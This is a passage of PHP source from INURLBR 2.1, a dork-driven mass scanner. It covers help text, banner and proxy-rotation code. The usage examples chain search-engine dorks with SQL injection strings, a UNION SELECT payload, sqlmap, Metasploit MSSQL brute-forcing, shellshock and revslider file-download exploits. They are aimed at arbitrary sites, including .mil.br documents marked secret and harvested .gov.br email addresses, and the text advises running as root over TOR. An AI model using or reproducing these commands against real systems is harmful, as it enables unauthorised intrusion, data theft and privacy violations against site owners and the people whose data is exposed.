  890. {$_SESSION["c1"]}---regexp-filter{$_SESSION["c0"]} Using regular expression to filter his research, the value of the
  891.     Expression will be sought within the target/URL.
  892.    Example:  {$_SESSION["c1"]}---regexp-filter{$_SESSION["c2"]} {regular_expression}{$_SESSION["c0"]}
  893.    EMAIL:  
  894.    Usage:    {$_SESSION["c1"]}---regexp-filter{$_SESSION["c2"]} '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
  895.  
  896.  
  897.    [!] Small commands manager:
  898.    
  899. {$_SESSION["c1"]}--exploit-cad{$_SESSION["c0"]} Command register for use within the scanner.
  900.    Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
  901.    Example Format: NMAP::nmap -sV _TARGET_
  902.    Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
  903.    Usage:    {$_SESSION["c1"]}--exploit-cad{$_SESSION["c2"]} 'NMAP::nmap -sV _TARGET_'{$_SESSION["c0"]}
  904.    Observation: Each registered command is identified by an id of your array.
  905.                 Commands are logged in exploits.conf file.
  906.  
  907. {$_SESSION["c1"]}--exploit-all-id{$_SESSION["c0"]} Execute commands, exploits based on id of use,
  908.    (all) is run for each target found by the engine.
  909.     Example: {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]}{id,id}{$_SESSION["c0"]}
  910.     Usage:   {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]}1,2,8,22
  911.        
  912. {$_SESSION["c1"]}--exploit-vul-id{$_SESSION["c0"]} Execute commands, exploits based on id of use,
  913.    (vull) run command only if the target was considered vulnerable.
  914.     Example: {$_SESSION["c1"]}--exploit-vul-id {$_SESSION["c2"]}{id,id}{$_SESSION["c0"]}
  915.     Usage:   {$_SESSION["c1"]}--exploit-vul-id {$_SESSION["c2"]}1,2,8,22
  916.  
  917. {$_SESSION["c1"]}--exploit-list{$_SESSION["c0"]} List all entries command in exploits.conf file.
  918.  
  919.  
  920.    [!] Running subprocesses:
  921.    
  922. {$_SESSION["c1"]}--sub-file{$_SESSION["c0"]}  Subprocess performs an injection
  923.     strings in URLs found by the engine, via GET or POST.
  924.     Example: {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}{youfile}{$_SESSION["c0"]}
  925.     Usage:   {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}exploits_get.txt
  926.        
  927. {$_SESSION["c1"]}--sub-get{$_SESSION["c0"]} defines whether the strings coming from
  928.     --sub-file will be injected via GET.
  929.     Usage:   {$_SESSION["c1"]}--sub-get
  930.        
  931. {$_SESSION["c1"]}--sub-post{$_SESSION["c0"]} defines whether the strings coming from
  932.     --sub-file will be injected via POST.
  933.     Usage:   {$_SESSION["c1"]}--sub-get
  934.        
  935. {$_SESSION["c1"]}--sub-concat{$_SESSION["c0"]} Sets string to be concatenated with
  936.     the target host within the subprocess
  937.     Example: {$_SESSION["c1"]}--sub-concat {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
  938.     Usage:   {$_SESSION["c1"]}--sub-concat {$_SESSION["c2"]}'/login.php'{$_SESSION["c0"]}
  939.  
  940. {$_SESSION["c1"]}--sub-cmd-vul{$_SESSION["c0"]} Each vulnerable URL found within the sub-process
  941.     will execute the parameters of this command.
  942.     Example: {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
  943.     Usage:   {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
  944.              {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
  945.              {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
  946.                  
  947. {$_SESSION["c1"]}--sub-cmd-all{$_SESSION["c0"]} Run command to each target found within the sub-process scope.
  948.     Example: {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
  949.     Usage:   {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
  950.              {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
  951.              {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
  952.  
  953.  
  954. {$_SESSION["c1"]}--port-scan{$_SESSION["c0"]} Defines ports that will be validated as open.
  955.     Example: {$_SESSION["c1"]}--port-scan {$_SESSION["c2"]}{ports}{$_SESSION["c0"]}
  956.     Usage:   {$_SESSION["c1"]}--port-scan {$_SESSION["c2"]}'22,21,23,3306'{$_SESSION["c0"]}
  957.        
  958. {$_SESSION["c1"]}--port-cmd{$_SESSION["c0"]} Define command that runs when finding an open door.
  959.     Example: {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
  960.     Usage:   {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}'./xpl _TARGETIP_:_PORT_'{$_SESSION["c0"]}
  961.              {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}'./xpl _TARGETIP_/file.php?sqli=1'{$_SESSION["c0"]}
  962.  
  963. {$_SESSION["c1"]}--port-write{$_SESSION["c0"]} Send values for door.
  964.     Example: {$_SESSION["c1"]}--port-write {$_SESSION["c2"]}{'value0','value1','value3'}{$_SESSION["c0"]}
  965.     Usage:   {$_SESSION["c1"]}--port-write {$_SESSION["c2"]}\"'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'\"{$_SESSION["c0"]}
  966.  
  967.  
  968.  
  969.    [!] Modifying values used within script parameters:
  970.    
  971. {$_SESSION["c1"]}md5{$_SESSION["c0"]} Encrypt values in md5.
  972.     Example: {$_SESSION["c1"]}md5({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
  973.     Usage:   {$_SESSION["c1"]}md5({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
  974.     Usage:   {$_SESSION["c1"]}--exploit-get 'user?id=md5({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
  975.  
  976. {$_SESSION["c1"]}base64{$_SESSION["c0"]} Encrypt values in base64.
  977.     Example: {$_SESSION["c1"]}base64({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
  978.     Usage:   {$_SESSION["c1"]}base64({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
  979.     Usage:   {$_SESSION["c1"]}--exploit-get 'user?id=base64({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
  980.        
  981. {$_SESSION["c1"]}hex{$_SESSION["c0"]} Encrypt values in hex.
  982.     Example: {$_SESSION["c1"]}hex({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
  983.     Usage:   {$_SESSION["c1"]}hex({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
  984.     Usage:   {$_SESSION["c1"]}--exploit-get 'user?id=hex({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
  985.  
  986. {$_SESSION["c1"]}hex{$_SESSION["c0"]} Generate random values.
  987.     Example: {$_SESSION["c1"]}random({$_SESSION["c2"]}{character_counter}{$_SESSION["c1"]}){$_SESSION["c0"]}
  988.     Usage:   {$_SESSION["c1"]}random({$_SESSION["c2"]}8{$_SESSION["c1"]}){$_SESSION["c0"]}
  989.     Usage:   {$_SESSION["c1"]}--exploit-get 'user?id=random({$_SESSION["c2"]}8{$_SESSION["c1"]})'{$_SESSION["c0"]}
  990.  
  991. ");
  992. }
  993.  
  994. function __info() {
  995.  
  996.     return system("command clear") . __getOut("
  997. {$_SESSION["c1"]}_____ _   _ ______ ____  
  998. |_   _| \ | |  ____/ __ \
  999.  | | |  \| | |__ | |  | |
  1000.  | | | . ` |  __|| |  | |
  1001. _| |_| |\  | |   | |__| |
  1002. |_____|_| \_|_|    \____/
  1003.  
  1004. {$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current PHP version=>{$_SESSION["c1"]}[ " . phpversion() . "{$_SESSION["c0"]} ]
  1005. {$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current script owner=>{$_SESSION["c1"]}[ " . get_current_user() . "{$_SESSION["c0"]} ]
  1006. {$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current uname=>{$_SESSION["c1"]}[ " . php_uname() . "{$_SESSION["c0"]} ]
  1007. {$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current pwd=>{$_SESSION["c1"]}[ " . getcwd() . "{$_SESSION["c0"]} ]
  1008. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1009.  
  1010. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}GRUPO  INURL BRASIL - PESQUISA AVANÇADA.
  1011. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}SCRIPT NAME: INURLBR 2.1
  1012. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}AUTOR:    Cleiton Pinheiro
  1013. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Nick:     Googleinurl
  1014. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Email:    inurlbr@gmail.com  
  1015. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Blog:     http://blog.inurl.com.br
  1016. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Twitter:  https://twitter.com/googleinurl
  1017. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Facebook: https://fb.com/InurlBrasil
  1018. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}GIT:      https://github.com/googleinurl
  1019. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Pastebin  https://pastebin.com/u/Googleinurl
  1020. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}PSS:      https://packetstormsecurity.com/user/googleinurl
  1021. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}YOUTUBE:  http://youtube.com/c/INURLBrasil
  1022. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}PLUS:     http://google.com/+INURLBrasil
  1023. {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Version:  2.1
  1024.  
  1025. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1026.  
  1027.   {$_SESSION["c1"]}[+]{$_SESSION["c16"]}NECESSARY FOR THE PROPER FUNCTIONING OF THE SCRIPT{$_SESSION["c0"]}
  1028.    
  1029.     {$_SESSION["c1"]}[ - ]{$_SESSION["c16"]} LIB & CONFIG{$_SESSION["c0"]}
  1030.  
  1031. * PHP Version         5.4.7
  1032. * php5-curl           LIB
  1033. * php5-cli            LIB  
  1034. * cURL support        enabled
  1035. * cURL Information    7.24.0
  1036. * allow_url_fopen     On
  1037. * permission          Reading & Writing
  1038. * User                root privilege, or is in the sudoers group
  1039. * Operating system    LINUX
  1040. * Proxy random        TOR
  1041.                
  1042. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1043.  
  1044.   {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}PERMISSION EXECUTION: chmod +x inurlbr.php{$_SESSION["c0"]}
  1045.   {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING LIB PHP-CURL: sudo apt-get install php5-curl{$_SESSION["c0"]}
  1046.   {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING LIB PHP-CLI: sudo apt-get install php5-cli{$_SESSION["c0"]}
  1047.   {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033[0m
  1048.   {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en{$_SESSION["c0"]}
  1049.  
  1050. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1051.  
  1052.     {$_SESSION["c1"]}[ - ]{$_SESSION["c16"]} COMMANDS SIMPLE SCRIPT{$_SESSION["c0"]}
  1053.  
  1054.  
  1055. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:php?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c0"]}
  1056.  
  1057. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:aspx?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c0"]}
  1058.  
  1059. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:aspx (id|new)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\"{$_SESSION["c0"]}
  1060.  
  1061. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'index of wp-content/uploads' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6,2,4 {$_SESSION["c1"]}-t {$_SESSION["c2"]}2 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'Index of /wp-content/uploads'{$_SESSION["c0"]}
  1062.  
  1063. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.mil.br intext:(confidencial) ext:pdf' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 -t 2 --exploit-get {$_SESSION["c3"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'confidencial'{$_SESSION["c0"]}
  1064.  
  1065. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.mil.br intext:(secreto) ext:pdf' {$_SESSION["c1"]}-s save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}2 {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'secreto'{$_SESSION["c0"]}        
  1066.  
  1067. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:aspx (id|new)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\"{$_SESSION["c0"]}
  1068.  
  1069. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'.new.php?new id' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6,7,2,3 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}'+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'::EXPLOIT-SUCESS::'{$_SESSION["c0"]}
  1070.  
  1071. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'new.php?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}teste.txt  {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}?´0x27  {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]}'{$_SESSION["c0"]}
  1072.  
  1073. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:pt inurl:aspx (id|q)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}bruteforce.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}?´0x27 {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'msfcli auxiliary/scanner/mssql/mssql_login RHOST={$_SESSION["c9"]}_TARGETIP_ {$_SESSION["c2"]}MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'{$_SESSION["c0"]}
  1074.  
  1075. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:id & inurl:php' {$_SESSION["c1"]}-s {$_SESSION["c2"]}get.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'python ../sqlmap/sqlmap.py -u \"{$_SESSION["c14"]}_TARGETFULL_{$_SESSION["c2"]}\" --dbs'{$_SESSION["c0"]}
  1076.  
  1077. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:index.php?id=' {$_SESSION["c1"]}-q 1,2,10 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"'?´0x27'\" {$_SESSION["c1"]}-s {$_SESSION["c2"]}report.txt {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap -Pn -p 1-8080 --script http-enum --open {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]}'{$_SESSION["c0"]}
  1078.  
  1079. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email' {$_SESSION["c1"]}-s {$_SESSION["c2"]}reg.txt -q 1  --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
  1080.  
  1081. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}emails.txt {$_SESSION["c1"]}-m{$_SESSION["c0"]}
  1082.  
  1083. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}urls.txt {$_SESSION["c1"]}-u{$_SESSION["c0"]}
  1084.  
  1085. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:gov.bo' {$_SESSION["c1"]}-s {$_SESSION["c2"]}govs.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c0"]}
  1086.  
  1087. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.uk' {$_SESSION["c1"]}-s {$_SESSION["c2"]}uk.txt {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]} 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)' {$_SESSION["c0"]}
  1088.  
  1089. ./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksSqli.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}govs.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c0"]}
  1090.  
  1091. ./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksSqli.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}sqli.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6  {$_SESSION["c1"]}--irc {$_SESSION["c2"]}'irc.rizon.net#inurlbrasil'   {$_SESSION["c0"]}
  1092.  
  1093. ./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:\"cgi-bin/login.cgi\"' {$_SESSION["c1"]}-s {$_SESSION["c2"]}cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_' {$_SESSION["c0"]}
  1094.  
  1095. ./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]}
  1096.  
  1097. ./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]} {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\"{$_SESSION["c0"]}
  1098.  
  1099. ./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]} {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?pass=1234\" {$_SESSION["c1"]}-a {$_SESSION["c2"]}'<title>hello! admin</title>'{$_SESSION["c0"]}
  1100.  
  1101. ./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find_valid_cod-200.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}5{$_SESSION["c0"]}
  1102.  
  1103. ./inurlbr.php {$_SESSION["c1"]}--range {$_SESSION["c2"]}'200.20.10.1,200.20.10.255' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php roteador.php _TARGETIP_'  {$_SESSION["c0"]}
  1104.  
  1105. ./inurlbr.php {$_SESSION["c1"]}--range-rad {$_SESSION["c2"]}'1500' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php roteador.php _TARGETIP_'  {$_SESSION["c0"]}
  1106.  
  1107. ./inurlbr.php {$_SESSION["c1"]}--dork-rad {$_SESSION["c2"]}'20' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\" {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8  {$_SESSION["c0"]}
  1108.  
  1109. ./inurlbr.php {$_SESSION["c1"]}--dork-rad {$_SESSION["c2"]}'20' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\" {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8  {$_SESSION["c0"]} --pr
  1110.  
  1111. ./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksCGI.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8  {$_SESSION["c0"]} --pr --shellshock
  1112.  
  1113. ./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorks_Wordpress_revslider.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8  {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}'xpls_Arbitrary_File_Download.txt' {$_SESSION["c0"]}
  1114.   {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1115.  
  1116.  {$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}It it also useful to know the full path to the PHP binary on your computer. {$_SESSION["c0"]}
  1117.  {$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}There are several ways of finding out. For Ubuntu and Mac OS X the path is '/usr/bin/php'.{$_SESSION["c0"]}
  1118.  
  1119.  googleinurl@inurlbr:~$ which php
  1120.  /usr/bin/php
  1121.  googleinurl@inurlbr:~/cli$ whereis php
  1122.  php: /usr/bin/php /usr/share/php /usr/share/man/man1/php.1.gz
  1123.  googleinurl@inurlbr:~/cli$ type -a php
  1124.  php is /usr/bin/php
  1125.  
  1126. {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
  1127.  
  1128.  
  1129. ");
  1130. }
  1131.  
  1132. ################################################################################
  1133. #BANNER HOME####################################################################
  1134.  
  1135. function __bannerLogo() {
  1136.  
  1137.     $vis = ($_SESSION["os"] != 1) ? ("\033[1;3" . rand(1, 10) . "m") : NULL;
  1138.  
  1139.     return (!is_null($_SESSION['config']['no-banner']) ? NULL : system("command clear") . "
  1140. {$vis}    _____ {$_SESSION["c1"]} .701F. .iBR.   .7CL. .70BR.   .7BR. .7BR'''Cq.   .70BR.      {$_SESSION["c12"]}.1BR'''Yp, .8BR'''Cq.  
  1141. {$vis}   (_____){$_SESSION["c1"]}   01     01N.    C     01       C     01   .01.    01        {$_SESSION["c3"]}  01    Yb   01   .01.
  1142. {$vis}   (() ()){$_SESSION["c1"]}   01     C YCb   C     01       C     01   ,C9     01        {$_SESSION["c12"]}  01    dP   01   ,C9  
  1143. {$vis}    \   / {$_SESSION["c1"]}   01     C  .CN. C     01       C     0101dC9      01        {$_SESSION["c3"]}  01'''bg.   0101dC9  
  1144. {$vis}     \ /  {$_SESSION["c1"]}   01     C   .01.C     01       C     01  YC.      01      , {$_SESSION["c12"]}  01    .Y   01  YC.  
  1145. {$vis}     /=\  {$_SESSION["c1"]}   01     C     Y01     YC.     ,C     01   .Cb.    01     ,C {$_SESSION["c3"]}  01    ,9   01   .Cb.
  1146. {$vis}    [___] {$_SESSION["c1"]} .J01L. .JCL.    YC      .b0101d'.   .J01L. .J01. .J01010101C {$_SESSION["c12"]}.J0101Cd9  .J01L. .J01./ {$_SESSION["c1"]}2.1\n
  1147. {$_SESSION["c1"]}__[ ! ] Neither war between hackers, nor peace for the system.
  1148. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://blog.inurl.com.br
  1149. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://fb.com/InurlBrasil
  1150. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://twitter.com/@googleinurl{$_SESSION["c0"]}
  1151. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://github.com/googleinurl{$_SESSION["c0"]}
  1152. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current PHP version::[ {$_SESSION["c1"]}" . phpversion() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
  1153. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current script owner::[ {$_SESSION["c1"]}" . get_current_user() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
  1154. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current uname::[ {$_SESSION["c1"]}" . php_uname() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
  1155. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current pwd::[ {$_SESSION["c1"]}" . getcwd() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
  1156. {$_SESSION["c1"]}__[ ! ] {$_SESSION["c2"]}Help: php inurlbr.php --help{$_SESSION["c0"]}
  1157. {$_SESSION["c1"]}------------------------------------------------------------------------------------------------------------------------{$_SESSION["c0"]}
  1158. ");
  1159. }
  1160.  
  1161. ################################################################################
  1162. #CHANGE PROXY FUNCTION IN TIME##################################################
  1163. ################################################################################
  1164.  
  1165. function __timeValueChangeProxy($sec = NULL) {
  1166.  
  1167.     return not_isnull_empty($sec) ? date('Y-m-d H:i:s', strtotime(date('Y-m-d H:i:s') . " + {$sec} second")) : NULL;
  1168. }
  1169.  
  1170. function __timeSecChangeProxy($list_proxy) {
  1171.  
  1172.     if ($_SESSION["config"]["time_change_proxy"] < date('Y-m-d H:i:s') && !is_null($list_proxy)) {
  1173.         $proxy = $list_proxy[rand(0, count($list_proxy) - 1)];
  1174.         echo ("[ INFO ][PROXY] CHANGE: {$proxy}  - " . date('Y-m-d H:i:s') . "\n");
  1175.         $_SESSION["config"]["proxy"] = $proxy;
  1176.         $_SESSION["config"]["time_change_proxy"] = __timeValueChangeProxy($_SESSION["config"]["time-proxy"]);
  1177.         __plus();
  1178.     }
